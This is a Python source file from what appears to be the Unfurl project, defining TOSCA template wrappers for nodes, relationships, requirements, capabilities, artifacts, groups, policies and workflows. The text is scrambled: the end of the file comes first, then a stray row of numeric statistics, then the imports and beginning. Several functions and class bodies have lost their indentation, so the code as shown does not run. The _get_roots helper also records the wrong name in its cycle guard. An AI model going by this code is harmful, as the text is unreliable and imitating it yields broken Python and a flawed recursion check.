        """Delegate to the module-level find_props() with this entity's defs."""
        for name, val in find_props(attributes, self.propertyDefs, matchfn):
            yield name, val
    @property
    def base_dir(self):
        """Directory this template was defined in (falls back to the spec's)."""
        if self.toscaEntityTemplate._source:
            return self.toscaEntityTemplate._source
        elif self.spec:
            return self.spec.base_dir
        else:
            return None
    def aggregate_only(self):
        "The template is only the sum of its parts."
        for iDef in self.get_interfaces():
            if iDef.interfacename == "Standard":
                return False
            if iDef.interfacename == "Install" and iDef.name == "discover":
                return False
        # no implementations found
        return True
    @property
    def required(self):
        # if this template is required by another template
        for root in _get_roots(self):
            if self.spec.substitution_template:
                # required if a root is the substitution mapping's template
                if self.spec.substitution_template is root:
                    return True
            elif 'default' not in root.directives:
                # required if some root is not merely a "default" template
                return True
        return False
def _get_roots(node, seen=None):
# node can reference each other's properties, so we need to handle circular references
if seen is None:
seen = set()
yield node
for parent in node._isReferencedBy:
if parent.name not in seen:
seen.add( node.name )
yield from _get_roots(parent, seen)
class NodeSpec(EntitySpec):
    """Wraps a toscaparser NodeTemplate: capabilities, requirements,
    relationships, artifacts and policies are exposed lazily."""
    # has attributes: tosca_id, tosca_name, state, (3.4.1 Node States p.61)
    def __init__(self, template=None, spec=None):
        # with no arguments, builds a placeholder node from the default topology
        if not template:
            template = next(
                iter(create_default_topology().topology_template.nodetemplates)
            )
            spec = ToscaSpec(create_default_topology())
        else:
            assert spec
        EntitySpec.__init__(self, template, spec)
        # lazily-populated caches
        self._capabilities = None
        self._requirements = None
        self._relationships = []
        self._artifacts = None
    def _resolve(self, key):
        """Expression lookup: base attributes first, then requirements by name."""
        try:
            return super()._resolve(key)
        except KeyError:
            req = self.get_requirement(key)
            if not req:
                raise KeyError(key)
            relationship = req.relationship
            # hack!
            relationship.toscaEntityTemplate.entity_tpl = list(req.entity_tpl.values())[
                0
            ]
            return relationship
    @property
    def artifacts(self):
        """Mapping of artifact name to ArtifactSpec (built on first access)."""
        if self._artifacts is None:
            self._artifacts = {
                name: ArtifactSpec(artifact, self)
                for name, artifact in self.toscaEntityTemplate.artifacts.items()
            }
        return self._artifacts
    @property
    def policies(self):
        """Yield policies targeting this node directly or via its groups."""
        if not self.spec:
            return
        for p in self.spec.policies.values():
            if p.toscaEntityTemplate.targets_type == "groups":
                # the policy has groups as members, see if this node's groups is one of them
                if p.members & {g.name for g in self.groups}:
                    yield p
            elif p.toscaEntityTemplate.targets_type == "node_templates":
                if self.name in p.members:
                    yield p
    @property
    def requirements(self):
        """Mapping of requirement name to RequirementSpec (built on first access).

        Building this also links each requirement to the target node's
        RelationshipSpec via add_relationship().
        """
        if self._requirements is None:
            self._requirements = {}
            nodeTemplate = self.toscaEntityTemplate
            for (relTpl, req, req_type_def) in nodeTemplate.relationships:
                name, values = next(iter(req.items()))
                reqSpec = RequirementSpec(name, req, self, req_type_def)
                if relTpl.target:
                    nodeSpec = self.spec.get_template(relTpl.target.name)
                    if nodeSpec:
                        nodeSpec.add_relationship(reqSpec)
                    else:
                        msg = f'Missing target node "{relTpl.target.name}" for requirement "{name}" on "{self.name}"'
                        ExceptionCollector.appendException(UnfurlValidationError(msg))
                self._requirements[name] = reqSpec
        return self._requirements
    def get_requirement(self, name):
        return self.requirements.get(name)
    def get_relationship(self, name):
        req = self.requirements.get(name)
        if not req:
            return None
        return req.relationship
    @property
    def relationships(self):
        """
        returns a list of RelationshipSpecs that are targeting this node template.
        """
        for r in self.toscaEntityTemplate.get_relationship_templates():
            assert r.source
            # calling requirement property will ensure the RelationshipSpec is properly linked
            self.spec.get_template(r.source.name).requirements
        return self._get_relationship_specs()
    def _get_relationship_specs(self):
        """Sync self._relationships with the parser's relationship templates."""
        if len(self._relationships) != len(
            self.toscaEntityTemplate.get_relationship_templates()
        ):
            # get_relationship_templates() is a list of RelationshipTemplates that target the node
            rIds = {id(r.toscaEntityTemplate) for r in self._relationships}
            for r in self.toscaEntityTemplate.get_relationship_templates():
                if id(r) not in rIds and r.capability:
                    self._relationships.append(RelationshipSpec(r, self.spec, self))
        return self._relationships
    def get_capability_interfaces(self):
        """Interfaces defined on relationships targeting this node."""
        idefs = [r.get_interfaces() for r in self._get_relationship_specs()]
        return [i for elem in idefs for i in elem if i.name != "default"]
    def get_requirement_interfaces(self):
        """Interfaces defined on this node's outgoing requirements."""
        idefs = [r.get_interfaces() for r in self.requirements.values()]
        return [i for elem in idefs for i in elem if i.name != "default"]
    @property
    def capabilities(self):
        """Mapping of capability name to CapabilitySpec (built on first access)."""
        if self._capabilities is None:
            self._capabilities = {
                c.name: CapabilitySpec(self, c)
                for c in self.toscaEntityTemplate.get_capabilities_objects()
            }
        return self._capabilities
    def get_capability(self, name):
        return self.capabilities.get(name)
    def add_relationship(self, reqSpec):
        """Link *reqSpec* (a requirement on another node) to the matching
        RelationshipSpec that targets this node."""
        # find the relationship for this requirement:
        for relSpec in self._get_relationship_specs():
            # the RelationshipTemplate should have had the source node assigned by the tosca parser
            # XXX this won't distinguish between more than one relationship between the same two nodes
            # to fix this have the RelationshipTemplate remember the name of the requirement
            if (
                relSpec.toscaEntityTemplate.source.name
                == reqSpec.parentNode.toscaEntityTemplate.name
            ):
                assert not reqSpec.relationship or reqSpec.relationship is relSpec, (reqSpec.relationship, relSpec)
                reqSpec.relationship = relSpec
                assert not relSpec.requirement or relSpec.requirement is reqSpec, (relSpec.requirement, reqSpec)
                if not relSpec.requirement:
                    relSpec.requirement = reqSpec
                break
        else:
            msg = f'relationship not found for requirement "{reqSpec.name}" on "{reqSpec.parentNode}" targeting "{self.name}"'
            ExceptionCollector.appendException(UnfurlValidationError(msg))
    @property
    def abstract(self):
        """Return "select"/"substitute" if the node carries that directive."""
        for name in ("select", "substitute"):
            if name in self.toscaEntityTemplate.directives:
                return name
        return None
    @property
    def directives(self):
        return self.toscaEntityTemplate.directives
class RelationshipSpec(EntitySpec):
    """
    Links a RequirementSpec to a CapabilitySpec.
    """
    def __init__(self, template=None, spec=None, targetNode=None):
        # template is a RelationshipTemplate
        # It is a full-fledged entity with a name, type, properties, attributes, interfaces, and metadata.
        # its connected through target, source, capability
        # its RelationshipType has valid_target_types
        if not template:
            # no arguments: build a placeholder from the default topology
            template = (
                create_default_topology().topology_template.relationship_templates[0]
            )
            spec = ToscaSpec(create_default_topology())
        else:
            assert spec
        EntitySpec.__init__(self, template, spec)
        self.requirement = None
        self.capability = None
        if targetNode:
            # resolve the CapabilitySpec on the target node that this
            # relationship connects to
            assert targetNode.toscaEntityTemplate is template.target
            for c in targetNode.capabilities.values():
                if c.toscaEntityTemplate is template.capability:
                    self.capability = c
                    break
            else:
                raise UnfurlError(
                    "capability %s not found in %s for %s"
                    % (
                        template.capability.name,
                        [c.name for c in targetNode.capabilities.values()],
                        targetNode.name,
                    )
                )
    @property
    def source(self):
        """The NodeSpec declaring the requirement (None if unlinked)."""
        return self.requirement.parentNode if self.requirement else None
    @property
    def target(self):
        """The NodeSpec owning the target capability (None if unlinked)."""
        return self.capability.parentNode if self.capability else None
    def _resolve(self, key):
        """Expression lookup: base attributes, then the target node/capability."""
        try:
            return super()._resolve(key)
        except KeyError:
            if self.capability:
                if self.capability.parentNode.is_compatible_target(key):
                    return self.capability.parentNode
                if self.capability.is_compatible_target(key):
                    return self.capability
            raise KeyError(key)
    def get_uri(self):
        """Mangled identifier: "<source node>~r~<name>" (see get_template())."""
        suffix = "~r~" + self.name
        return self.source.name + suffix if self.source else suffix
    def matches_target(self, capability):
        """If this is a default relationship template, return the capabilities
        of *capability*'s node that it can connect to (falsy if none)."""
        defaultFor = self.toscaEntityTemplate.default_for
        if not defaultFor:
            return False
        nodeTemplate = capability.parentNode.toscaEntityTemplate
        if (
            defaultFor == self.toscaEntityTemplate.ANY
            or defaultFor == nodeTemplate.name
            or nodeTemplate.is_derived_from(defaultFor)
            or defaultFor == capability.name
            or capability.is_derived_from(defaultFor)
        ):
            return self.toscaEntityTemplate.get_matching_capabilities(
                nodeTemplate, capability.name
            )
        return False
class RequirementSpec:
    """
    A Requirement shares a Relationship with a Capability.
    """
    # XXX need __eq__ since this doesn't derive from EntitySpec
    def __init__(self, name, req, parent, type_tpl):
        # entity_tpl may specify:
        # capability (definition name or type name), node (template name or type name), and node_filter,
        # relationship (template name or type name or inline relationship template)
        # occurrences
        self.source = self.parentNode = parent # NodeSpec
        self.spec = parent.spec
        self.name = name
        self.entity_tpl = req
        self.relationship = None
        self.type_tpl = type_tpl
    def __repr__(self):
        return f"{self.__class__.__name__}('{self.name}')"
    @property
    def artifacts(self):
        """Artifacts are inherited from the node declaring this requirement."""
        return self.parentNode.artifacts
    def get_uri(self):
        """Mangled identifier: "<node name>~q~<requirement name>"."""
        return f"{self.parentNode.name}~q~{self.name}"
    def get_interfaces(self):
        """Interfaces live on the relationship, when one has been linked."""
        if not self.relationship:
            return []
        return self.relationship.get_interfaces()
    def get_nodefilter_properties(self):
        # XXX should merge type_tpl with entity_tpl
        return get_nodefilters(self.type_tpl, "properties")
    def get_nodefilter_requirements(self):
        # XXX should merge type_tpl with entity_tpl
        return get_nodefilters(self.type_tpl, "requirements")
def get_nodefilters(entity_tpl, key):
    """Yield (name, value) pairs from the ``node_filter`` section *key*
    (e.g. "properties" or "requirements") of *entity_tpl*."""
    if not isinstance(entity_tpl, dict):
        return
    nodefilter = entity_tpl.get("node_filter")
    if not nodefilter or key not in nodefilter:
        return
    for constraint in nodefilter[key]:
        # each entry is a single-item map: {name: value}
        name, value = next(iter(constraint.items()))
        yield name, value
class CapabilitySpec(EntitySpec):
    """Wraps a capability of a node template; delegates artifacts and
    interfaces to its parent node."""
    def __init__(self, parent=None, capability=None):
        # with no arguments, uses the default topology's placeholder node
        if not parent:
            parent = NodeSpec()
            capability = parent.toscaEntityTemplate.get_capabilities_objects()[0]
        self.parentNode = parent
        assert capability
        # capabilities.Capability isn't an EntityTemplate but duck types with it
        EntitySpec.__init__(self, capability, parent.spec)
        self._relationships = None
        self._defaultRelationships = None
    @property
    def parent(self):
        return self.parentNode
    @property
    def artifacts(self):
        return self.parentNode.artifacts
    def get_interfaces(self):
        # capabilities don't have their own interfaces
        return self.parentNode.get_interfaces()
    def get_uri(self):
        # capabilities aren't standalone templates
        # this is demangled by getTemplate()
        return self.parentNode.name + "~c~" + self.name
    @property
    def relationships(self):
        """RelationshipSpecs that connect to this capability."""
        return [r for r in self.parentNode.relationships if r.capability is self]
    @property
    def default_relationships(self):
        """Default relationship templates that can target this capability
        (computed once and cached)."""
        if self._defaultRelationships is None:
            self._defaultRelationships = [
                relSpec
                for relSpec in self.spec.relationshipTemplates.values()
                if relSpec.matches_target(self)
            ]
        return self._defaultRelationships
    def get_default_relationships(self, relation=None):
        """Default relationships, optionally filtered by relationship type."""
        if not relation:
            return self.default_relationships
        return [
            relSpec
            for relSpec in self.default_relationships
            if relSpec.is_compatible_type(relation)
        ]
class TopologySpec(EntitySpec):
    """Wraps the topology_template itself as a pseudo-entity named
    "~topology", exposing inputs, outputs and node lookup for expressions."""
    # has attributes: tosca_id, tosca_name, state, (3.4.1 Node States p.61)
    def __init__(self, spec=None, inputs=None):
        if spec:
            self.spec = spec
            template = spec.template.topology_template
        else:
            # no spec given: fall back to the cached default topology
            template = create_default_topology().topology_template
            self.spec = ToscaSpec(create_default_topology())
        self.spec.topology = self
        inputs = inputs or {}
        self.toscaEntityTemplate = template
        self.name = "~topology"
        self.type = "~topology"
        # declared inputs merged with the supplied values (defaults win absent)
        self.inputs = {
            input.name: inputs.get(input.name, input.default)
            for input in template.inputs
        }
        self.outputs = {output.name: output.value for output in template.outputs}
        self.properties = CommentedMap() # XXX implement substitution_mappings
        self.defaultAttributes = {}
        self.propertyDefs = {}
        self.attributeDefs = {}
        self.capabilities = []
        self._defaultRelationships = None
        self._isReferencedBy = []
    def get_interfaces(self):
        # doesn't have any interfaces
        return []
    def is_compatible_target(self, targetStr):
        # only matches its own pseudo-name
        if self.name == targetStr:
            return True
        return False
    def is_compatible_type(self, typeStr):
        return False
    @property
    def primary_provider(self):
        """The "primary_provider" connection, if one was declared."""
        return self.spec.relationshipTemplates.get("primary_provider")
    @property
    def default_relationships(self):
        """All relationship templates declared with a ``default_for`` (cached)."""
        if self._defaultRelationships is None:
            self._defaultRelationships = [
                relSpec
                for relSpec in self.spec.relationshipTemplates.values()
                if relSpec.toscaEntityTemplate.default_for
            ]
        return self._defaultRelationships
    @property
    def base_dir(self):
        return self.spec.base_dir
    def _resolve(self, key):
        """Make attributes available to expressions"""
        try:
            return super()._resolve(key)
        except KeyError:
            # look up node templates by name, then by compatible type
            nodeTemplates = self.spec.nodeTemplates
            nodeSpec = nodeTemplates.get(key)
            if nodeSpec:
                return nodeSpec
            matches = [n for n in nodeTemplates.values() if n.is_compatible_type(key)]
            if not matches:
                raise KeyError(key)
            return matches
class Workflow:
    """Wraps a toscaparser workflow, adding step and precondition helpers."""
    def __init__(self, workflow):
        self.workflow = workflow
    def __str__(self):
        return f"Workflow({self.workflow.name})"
    def initial_steps(self):
        """Return the steps no other step transitions to (the entry points)."""
        followers = set()
        for step in self.workflow.steps.values():
            followers.update(step.on_success + step.on_failure)
        return [
            step
            for step in self.workflow.steps.values()
            if step.name not in followers
        ]
    def get_step(self, stepName):
        """Return the named step or None."""
        return self.workflow.steps.get(stepName)
    def match_step_filter(self, stepName, resource):
        """Evaluate the step's filter against *resource*'s attributes.

        Returns True/False, or None when no such step exists.
        """
        step = self.get_step(stepName)
        if not step:
            return None
        return all(cond.evaluate(resource.attributes) for cond in step.filter)
    def match_preconditions(self, resource):
        """True when every workflow precondition holds for *resource*."""
        for precondition in self.workflow.preconditions:
            # XXX if precondition.target_relationship
            target = resource.root.find_resource(precondition.target)
            if not target:
                # XXX target can be a group
                return False
            conditions = precondition.condition
            if not all(cond.evaluate(target.attributes) for cond in conditions):
                return False
        return True
class ArtifactSpec(EntitySpec):
    """Wraps a toscaparser Artifact (declared or anonymous/inline) and can
    resolve its file to a path via the template's import machinery."""
    # TOSCA-defined artifact keys surfaced as default attributes
    buildin_fields = (
        "file",
        "repository",
        "deploy_path",
        "version",
        "checksum",
        "checksum_algorithm",
        "mime_type",
        "file_extensions",
    )
    def __init__(self, artifact_tpl, template=None, spec=None, path=None):
        # 3.6.7 Artifact definition p. 84
        # template: the NodeSpec declaring the artifact (None for standalone)
        self.parentNode = template
        spec = template.spec if template else spec
        if isinstance(artifact_tpl, toscaparser.artifacts.Artifact):
            artifact = artifact_tpl
        else:
            # inline artifact
            name = self.get_name_from_artifact_spec(artifact_tpl)
            artifact_tpl.pop("name", None)  # "name" isn't a valid key
            custom_defs = spec and spec.template.topology_template.custom_defs or {}
            artifact = toscaparser.artifacts.Artifact(
                name, artifact_tpl, custom_defs, path
            )
        EntitySpec.__init__(self, artifact, spec)
        # resolve the declared repository name to the template's Repository
        self.repository = (
            spec
            and artifact.repository
            and spec.template.repositories.get(artifact.repository)
            or None
        )
        # map artifacts fields into properties
        for prop in self.buildin_fields:
            self.defaultAttributes[prop] = getattr(artifact, prop)
    def get_uri(self):
        """Mangled identifier: "<node name>~a~<artifact name>"."""
        if self.parentNode:
            return self.parentNode.name + "~a~" + self.name
        else:
            return "~a~" + self.name
    @property
    def file(self):
        return self.toscaEntityTemplate.file
    @property
    def base_dir(self):
        if self.toscaEntityTemplate._source:
            return get_base_dir(self.toscaEntityTemplate._source)
        else:
            return super().base_dir
    def get_path(self, resolver=None):
        """Resolve the artifact's file to a local path (fragment discarded)."""
        return self.get_path_and_fragment(resolver)[0]
    def get_path_and_fragment(self, resolver=None, tpl=None):
        """
        returns path, fragment
        """
        tpl = self.spec and self.spec.template.tpl or tpl
        if not resolver and self.spec:
            resolver = self.spec.template.import_resolver
        # reuse the import loader so repository URLs resolve the same way
        # as template imports do
        loader = toscaparser.imports.ImportsLoader(
            None, self.base_dir, tpl=tpl, resolver=resolver
        )
        path, isFile, fragment = loader._resolve_import_template(
            None, self.as_import_spec()
        )
        return path, fragment
    def as_import_spec(self):
        """Express this artifact as an import spec dict (file + repository)."""
        return dict(file=self.file, repository=self.toscaEntityTemplate.repository)
class GroupSpec(EntitySpec):
    """Wraps a toscaparser Group; exposes member groups and targeting policies."""
    def __init__(self, template, spec):
        EntitySpec.__init__(self, template, spec)
        self.members = template.members
    # XXX getNodeTemplates() getInstances(), getChildren()
    @property
    def member_groups(self):
        """GroupSpecs for members that are themselves groups."""
        return [self.spec.groups[m] for m in self.members if m in self.spec.groups]
    @property
    def policies(self):
        """Yield policies that target this group."""
        if not self.spec:
            return
        for p in self.spec.policies.values():
            if p.toscaEntityTemplate.targets_type == "groups":
                if self.name in p.members:
                    yield p
class PolicySpec(EntitySpec):
    """Wraps a toscaparser Policy; ``members`` is the set of target names
    (node templates or groups, per the policy's targets_type)."""
    def __init__(self, template, spec):
        EntitySpec.__init__(self, template, spec)
        self.members = set(template.targets_list)
| 37.005944 | 126 | 0.598615 |
import functools
import copy
from .tosca_plugins import TOSCA_VERSION
from .util import UnfurlError, UnfurlValidationError, get_base_dir, check_class_registry
from .eval import Ref, RefContext, map_value
from .result import ResourceRef, ResultsList
from .merge import patch_dict, merge_dicts
from .logs import get_console_log_level
from toscaparser.tosca_template import ToscaTemplate
from toscaparser.properties import Property
from toscaparser.elements.entity_type import EntityType
from toscaparser.elements.statefulentitytype import StatefulEntityType
import toscaparser.workflow
import toscaparser.imports
import toscaparser.artifacts
from toscaparser.common.exception import ExceptionCollector
import six
import logging
import re
from ruamel.yaml.comments import CommentedMap
logger = logging.getLogger("unfurl")
from toscaparser import functions
class RefFunc(functions.Function):
    """Pass-through TOSCA function: preserves ``{name: args}`` unevaluated so
    unfurl can evaluate the expression itself at runtime."""
    def result(self):
        return {self.name: self.args}
    def validate(self):
        # validation is deferred until unfurl evaluates the expression
        pass
# register unfurl's expression functions with the tosca parser so they pass
# through parsing unevaluated (handled by RefFunc above)
for func in ["eval", "ref", "get_artifact", "has_env", "get_env"]:
    functions.function_mappings[func] = RefFunc
toscaIsFunction = functions.is_function
def is_function(function):
    """Extend the tosca parser's is_function() to also recognize unfurl refs."""
    return toscaIsFunction(function) or Ref.is_ref(function)
# monkey-patch the parser so unfurl expressions aren't treated as plain values
functions.is_function = is_function
def validate_unfurl_identifier(name):
    """Return True if *name* is a valid unfurl template identifier.

    Identifiers start with a letter, ".", or "_" and may contain letters,
    digits, ".", "_", ":", and "-".
    """
    pattern = r"^[A-Za-z._][A-Za-z0-9._:\-]*$"
    return re.match(pattern, name) is not None
def encode_unfurl_identifier(name):
    """Escape characters not allowed in unfurl identifiers as ``-<ord>-``."""
    def _escape(match):
        codepoint = ord(match.group(0))
        return f"-{codepoint}-"
    return re.sub(r"[^A-Za-z0-9._:\-]", _escape, name)
def decode_unfurl_identifier(name):
    """Inverse of encode_unfurl_identifier(): turn ``-<ord>-`` back into the
    original character."""
    return re.sub(r"-([0-9]+)-", lambda m: chr(int(m.group(1))), name)
def find_standard_interface(op):
    """Map an operation name to its standard TOSCA interface name.

    Returns "Standard", "Install", "Configure", or "" when the operation
    isn't part of a known interface.
    """
    if op in StatefulEntityType.interfaces_node_lifecycle_operations:
        return "Standard"
    if op in ("check", "discover", "revert"):
        return "Install"
    if op in StatefulEntityType.interfaces_relationship_configure_operations:
        return "Configure"
    return ""
@functools.lru_cache(maxsize=None)
def create_default_topology():
    """Return a minimal ToscaTemplate used as a fallback/placeholder topology.

    Cached: every caller shares the same parsed template instance.
    """
    tpl = dict(
        tosca_definitions_version=TOSCA_VERSION,
        topology_template=dict(
            node_templates={"_default": {"type": "tosca.nodes.Root"}},
            relationship_templates={"_default": {"type": "tosca.relationships.Root"}},
        ),
    )
    return ToscaTemplate(yaml_dict_tpl=tpl)
def _patch(node, patchsrc, quote=False, tpl=None):
    """Apply a decorator/node-filter patch to *node*'s entity tpl (in place).

    With ``quote=True`` the patch is deep-copied verbatim; otherwise its
    expressions are evaluated against *node* first.  Returns the patched tpl.
    """
    if tpl is None:
        tpl = node.toscaEntityTemplate.entity_tpl
    ctx = RefContext(node, dict(template=tpl))
    # evaluate relative paths against the patch source's directory if it has one
    ctx.base_dir = getattr(patchsrc, "base_dir", ctx.base_dir)
    if quote:
        patch = copy.deepcopy(patchsrc)
    else:
        patch = map_value(patchsrc, ctx)
    logger.trace("patching node %s was %s", node.name, tpl)
    patched = patch_dict(tpl, patch, True)
    logger.trace("patched node %s: now %s", node.name, patched)
    return patched
class ToscaSpec:
InstallerType = "unfurl.nodes.Installer"
topology = None
    def evaluate_imports(self, toscaDef):
        """Evaluate conditional ("when") imports, pruning those that don't match.

        Mutates ``toscaDef["imports"]`` in place and returns True if any
        import was removed.
        """
        if not toscaDef.get("imports"):
            return False
        modified = []
        for import_tpl in toscaDef["imports"]:
            if not isinstance(import_tpl, dict) or "when" not in import_tpl:
                # unconditional import: always kept
                modified.append(import_tpl)
                continue
            match = Ref(import_tpl["when"]).resolve_one(
                RefContext(self.topology, trace=0)
            )
            if match:
                logger.debug(
                    "include import of %s, match found for %s",
                    import_tpl["file"],
                    import_tpl["when"],
                )
                modified.append(import_tpl)
            else:
                logger.verbose(
                    "skipping import of %s, no match for %s",
                    import_tpl["file"],
                    import_tpl["when"],
                )
        if len(modified) < len(toscaDef["imports"]):
            toscaDef["imports"] = modified
            return True
        return False
    def enforce_filters(self):
        """Apply node_filter properties/requirements from each requirement to
        its target template.  Returns True if anything was patched.
        """
        patched = False
        for nodespec in self.nodeTemplates.values():
            for req in nodespec.requirements.values():
                for prop, value in req.get_nodefilter_properties():
                    target = req.relationship and req.relationship.target
                    if target and isinstance(value, dict) and 'eval' in value:
                        # make SOURCE point back at the node declaring the filter
                        value.setdefault('vars', {})['SOURCE'] = dict(eval="::"+nodespec.name)
                    # NOTE(review): _patch is called even when target is None —
                    # presumably filters only exist when a relationship was
                    # resolved; verify this can't raise on an unlinked req
                    patch = dict(properties={prop: value})
                    _patch(target, patch, quote=True)
                    patched = True
                for name, value in req.get_nodefilter_requirements():
                    # annotate the target's requirements
                    target = req.relationship and req.relationship.target
                    if target:
                        # NOTE(review): assumes the target declares a matching
                        # requirement; a missing one would raise — confirm
                        matching_target_req = target.requirements.get(name)
                        _patch(nodespec, value, tpl=matching_target_req.entity_tpl[name])
                        patched = True
        return patched
    def _overlay(self, overlays):
        """Apply decorator *overlays* ({match-expression: patch tpl}) to every
        matching template; returns the list of patched tpls."""
        def _find_matches():
            # yields (matched template, patch tpl) pairs
            ExceptionCollector.start()
            for expression, _tpl in overlays.items():
                try:
                    match = Ref(expression).resolve_one(
                        RefContext(self.topology, trace=0)
                    )
                    if not match:
                        continue
                    if isinstance(match, (list, ResultsList)):
                        for item in match:
                            yield (item, _tpl)
                    else:
                        yield (match, _tpl)
                except:  # noqa: E722 -- deliberately broad: any evaluation error is recorded
                    ExceptionCollector.appendException(
                        UnfurlValidationError(
                            f'error evaluating decorator match expression "{expression}"',
                            log=True,
                        )
                    )
        matches = list(_find_matches())
        return [_patch(*m) for m in matches]
    def _parse_template(self, path, inputs, toscaDef, resolver):
        """Parse *toscaDef* into self.template and (re)build all the spec
        objects: node/relationship templates, topology, workflows, groups
        and policies.  Validation errors are collected, not raised.
        """
        self.template = ToscaTemplate(
            path=path,
            parsed_params=inputs,
            yaml_dict_tpl=toscaDef,
            import_resolver=resolver,
            verify=False,
        )
        ExceptionCollector.collecting = True # don't stop collecting validation errors
        ExceptionCollector.near = ' while instantiating the spec'
        self.nodeTemplates = {}
        self.installers = {}
        self.relationshipTemplates = {}
        for template in self.template.nodetemplates:
            if not template.type_definition:
                # type couldn't be resolved; error already collected by parser
                continue
            nodeTemplate = NodeSpec(template, self)
            if template.is_derived_from(self.InstallerType):
                self.installers[template.name] = nodeTemplate
            self.nodeTemplates[template.name] = nodeTemplate
        if hasattr(self.template, "relationship_templates"):
            for template in self.template.relationship_templates:
                relTemplate = RelationshipSpec(template, self)
                self.relationshipTemplates[template.name] = relTemplate
        self.load_imported_default_templates()
        self.topology = TopologySpec(self, inputs)
        substitution_mappings = self.template.topology_template.substitution_mappings
        if substitution_mappings and substitution_mappings.node:
            self.substitution_template = self.nodeTemplates.get(substitution_mappings.node)
        else:
            self.substitution_template = None
        self.load_workflows()
        self.groups = {
            g.name: GroupSpec(g, self) for g in self.template.topology_template.groups
        }
        self.policies = {
            p.name: PolicySpec(p, self)
            for p in self.template.topology_template.policies
        }
        ExceptionCollector.collecting = False
    def _patch(self, toscaDef, path):
        """Apply decorators, conditional imports and node filters to *toscaDef*.

        Returns truthy if anything was modified (caller re-parses if so);
        raises UnfurlValidationError if applying decorators itself failed.
        """
        matches = None
        decorators = self.load_decorators()
        if decorators:
            logger.debug("applying decorators %s", decorators)
            # snapshot errors so decorator errors can be reported on their own
            errorsSoFar = ExceptionCollector.exceptions[:]
            matches = self._overlay(decorators)
            if ExceptionCollector.exceptionsCaught():
                # restore the pre-existing errors ahead of the new ones
                ExceptionCollector.exceptions[:0] = errorsSoFar
                message = "\n".join(
                    ExceptionCollector.getExceptionsReport(
                        full=(get_console_log_level() < logging.INFO)
                    )
                )
                raise UnfurlValidationError(
                    f"TOSCA validation failed for {path}: \n{message}",
                    ExceptionCollector.getExceptions(),
                )
        modified_imports = self.evaluate_imports(toscaDef)
        annotated = self.enforce_filters()
        return matches or modified_imports or annotated
def __init__(
self, toscaDef, spec=None, path=None, resolver=None, skip_validation=False
):
self.discovered = None
if spec:
inputs = spec.get("inputs")
else:
inputs = None
if isinstance(toscaDef, ToscaTemplate):
self.template = toscaDef
else:
self.template = None
topology_tpl = toscaDef.get("topology_template")
if not topology_tpl:
toscaDef["topology_template"] = dict(
node_templates={}, relationship_templates={}
)
if spec:
self.load_instances(toscaDef, spec)
logger.info("Validating TOSCA template at %s", path)
try:
self._parse_template(path, inputs, toscaDef, resolver)
except:
if not ExceptionCollector.exceptionsCaught() or not self.template or not self.topology:
raise
patched = self._patch(toscaDef, path)
if patched:
self._parse_template(path, inputs, toscaDef, resolver)
if ExceptionCollector.exceptionsCaught():
message = "\n".join(
ExceptionCollector.getExceptionsReport(
full=(get_console_log_level() < logging.INFO)
)
)
if skip_validation:
logger.warning("Found TOSCA validation failures: %s", message)
else:
raise UnfurlValidationError(
f"TOSCA validation failed for {path}: \n{message}",
ExceptionCollector.getExceptions(),
)
    @property
    def base_dir(self):
        """Directory containing the template file, or None for in-memory templates."""
        if self.template.path is None:
            return None
        return get_base_dir(self.template.path)
    def _get_project_dir(self, home=False):
        """Return the root directory of the manifest's project.

        If ``home`` is true, return the home project's root instead.
        Returns None when no import resolver, manifest, local environment
        or project is available.
        """
        if self.template.import_resolver:
            manifest = self.template.import_resolver.manifest
            if manifest.localEnv:
                if home:
                    if manifest.localEnv.homeProject:
                        return manifest.localEnv.homeProject.projectRoot
                elif manifest.localEnv.project:
                    return manifest.localEnv.project.projectRoot
        return None
    def add_node_template(self, name, tpl, discovered=True):
        """Add a node template to the topology and return its ``NodeSpec``.

        ``tpl`` may carry a "custom_types" section, which is merged into the
        topology's custom type definitions. If ``discovered`` is true the
        template is also recorded in ``self.discovered``.
        """
        custom_types = None
        if "custom_types" in tpl:
            custom_types = tpl.pop("custom_types")
            if custom_types:
                self.template.topology_template.custom_defs.update(custom_types)
        nodeTemplate = self.template.topology_template.add_template(name, tpl)
        nodeSpec = NodeSpec(nodeTemplate, self)
        self.nodeTemplates[name] = nodeSpec
        if discovered:
            if self.discovered is None:
                self.discovered = CommentedMap()
            self.discovered[name] = tpl
            if custom_types:
                # restore the popped section so the recorded tpl is complete
                tpl["custom_types"] = custom_types
        return nodeSpec
def load_decorators(self):
decorators = CommentedMap()
for path, import_tpl in self.template.nested_tosca_tpls.items():
imported = import_tpl.get("decorators")
if imported:
decorators = merge_dicts(decorators, imported)
decorators = merge_dicts(decorators, self.template.tpl.get("decorators") or {})
return decorators
    def load_imported_default_templates(self):
        """Add node templates marked with the "default" directive from
        imported (nested) topologies, skipping names already defined."""
        for name, topology in self.template.nested_topologies.items():
            for nodeTemplate in topology.nodetemplates:
                if (
                    "default" in nodeTemplate.directives
                    and nodeTemplate.name not in self.nodeTemplates
                ):
                    nodeSpec = NodeSpec(nodeTemplate, self)
                    self.nodeTemplates[nodeSpec.name] = nodeSpec
    def load_workflows(self):
        """Build the workflow registry from the main topology and any nested
        topologies; the main topology's workflows take precedence (they are
        first in each list, and ``get_workflow`` returns the first entry)."""
        # workflow name -> list of Workflow objects (earlier entries win)
        workflows = {
            name: [Workflow(w)]
            for name, w in self.template.topology_template.workflows.items()
        }
        for topology in self.template.nested_topologies.values():
            for name, w in topology.workflows.items():
                workflows.setdefault(name, []).append(Workflow(w))
        self._workflows = workflows
def get_workflow(self, workflow):
wfs = self._workflows.get(workflow)
if wfs:
return wfs[0]
else:
return None
    def get_repository_path(self, repositoryName, file=""):
        """Resolve a repository name (and optional file inside it) to a path,
        or return None when the repository isn't defined in the template."""
        baseArtifact = ArtifactSpec(
            dict(repository=repositoryName, file=file), spec=self
        )
        if baseArtifact.repository:
            return baseArtifact.get_path()
        else:
            return None
    def get_template(self, name):
        """Look up a template spec by its (possibly mangled) name.

        Names may encode a path to a sub-object using markers produced by the
        corresponding ``get_uri`` implementations:

        * ``~topology``          -- the topology itself
        * ``node~c~capability``  -- a node's capability
        * ``node~r~requirement`` -- a node's relationship (node part optional)
        * ``node~q~requirement`` -- a node's requirement
        * ``node~a~artifact``    -- a node's artifact (node part optional)

        Returns None if any referenced object can't be found.
        """
        if name == "~topology":
            return self.topology
        elif "~c~" in name:
            nodeName, capability = name.split("~c~")
            nodeTemplate = self.nodeTemplates.get(nodeName)
            if not nodeTemplate:
                return None
            return nodeTemplate.get_capability(capability)
        elif "~r~" in name:
            nodeName, requirement = name.split("~r~")
